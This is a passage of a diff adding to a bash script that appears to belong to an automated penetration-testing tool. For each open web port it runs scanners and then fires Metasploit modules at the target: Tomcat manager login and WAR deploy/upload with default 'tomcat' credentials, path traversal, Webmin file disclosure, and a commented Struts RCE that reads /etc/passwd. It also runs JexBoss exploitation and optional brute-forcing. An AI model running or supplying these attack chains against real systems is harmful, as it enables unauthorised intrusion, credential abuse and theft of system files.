opened... running tests...$RESET" + wafw00f http://$TARGET:8080 + echo "" + whatweb http://$TARGET:8080 + echo "" + xsstracer $TARGET 8080 + sslscan --no-failed $TARGET:8080 + cd MassBleed + ./massbleed $TARGET port 8080 + cd .. + nikto -h http://$TARGET:8080 + cutycapt --url=http://$TARGET:8080 --out=loot/$TARGET-port8080.jpg + nmap -p 8080 -T5 --script=*proxy* $TARGET + msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;" + # EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT + # msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;" + python jexboss/jexboss.py -host http://$TARGET:8080 + python jexboss/jexboss.py -host https://$TARGET:8080 + +fi + +if [ -z "$port_8180" ]; +then + echo -e "$OKRED + -- --=[Port 8180 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 8180 opened... running tests...$RESET" + wafw00f http://$TARGET:8180 + echo "" + whatweb http://$TARGET:8180 + echo "" + xsstracer $TARGET 8180 + sslscan --no-failed $TARGET:8180 + sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8180 + cd MassBleed + ./massbleed $TARGET port 8180 + cd .. + nikto -h http://$TARGET:8180 + cutycapt --url=http://$TARGET:8180 --out=loot/$TARGET-port8180.jpg + nmap -p 8180 -T5 --script=*proxy* $TARGET + echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET" + echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET" + msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;" + python jexboss/jexboss.py -host http://$TARGET:8180 +fi + +if [ -z "$port_8443" ]; +then + echo -e "$OKRED + -- --=[Port 8443 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 8443 opened... running tests...$RESET" + wafw00f http://$TARGET:8443 + echo "" + whatweb http://$TARGET:8443 + echo "" + xsstracer $TARGET 8443 + sslscan --no-failed $TARGET:8443 + sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8443 + cd MassBleed + ./massbleed $TARGET port 8443 + cd .. + nikto -h https://$TARGET:8443 + cutycapt --url=https://$TARGET:8443 --out=loot/$TARGET-port8443.jpg + nmap -p 8443 -T5 --script=*proxy* $TARGET + python jexboss/jexboss.py -host https://$TARGET:8443 +fi + +if [ -z "$port_8888" ]; +then + echo -e "$OKRED + -- --=[Port 8888 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 8888 opened... running tests...$RESET" + wafw00f http://$TARGET:8888 + echo "" + whatweb http://$TARGET:8888 + echo "" + xsstracer $TARGET 8888 + nikto -h http://$TARGET:8888 + cutycapt --url=https://$TARGET:8888 --out=loot/$TARGET-port8888.jpg + python jexboss/jexboss.py -host http://$TARGET:8888 +fi + +if [ -z "$port_10000" ]; +then + echo -e "$OKRED + -- --=[Port 10000 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 10000 opened... running tests...$RESET" + echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET" + echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET" + msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;" +fi + +if [ -z "$port_49152" ]; +then + echo -e "$OKRED + -- --=[Port 49152 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 49152 opened... running tests...$RESET" + $SUPER_MICRO_SCAN $TARGET +fi + +echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET" +cd yasuo +ruby yasuo.rb -r $TARGET -b all +cd .. + +if [ "$AUTOBRUTE" = "0" ]; then + echo -e "$OKGREEN + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +$RESET" +else + echo -e "$OKGREEN + -- ----------------------------=[Running Brute Force]=--------------------- -- +$RESET" + cd ../BruteX + ./brutex $TARGET + rm -f hydra.restore + mv loot/* ../loot/ + cd .. + echo "" + rm -f scan.log +fi +./sniper loot +echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET" +exit 0